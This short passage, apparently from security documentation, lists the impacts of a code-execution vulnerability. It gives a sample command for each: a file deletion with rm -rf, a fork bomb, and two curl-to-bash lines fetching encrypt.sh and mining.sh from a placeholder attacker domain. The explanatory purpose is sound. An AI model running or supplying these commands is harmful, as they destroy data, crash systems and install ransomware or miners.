Due to its nature, code execution inherently encompasses most of the impacts and risks associated with vulnerabilities addressed in other files.
-
Deleting critical files
rm -rf /app/data/uploads/sensitive_file.txt
-
Fork bomb
:(){:|:&};:
- Malicious script (or file) execution.
curl -s https://[ATTACKER-DOMAIN]/encrypt.sh | bash
- Cryptocurrency mining
curl -s https://[ATTACKER-DOMAIN]/mining.sh | bash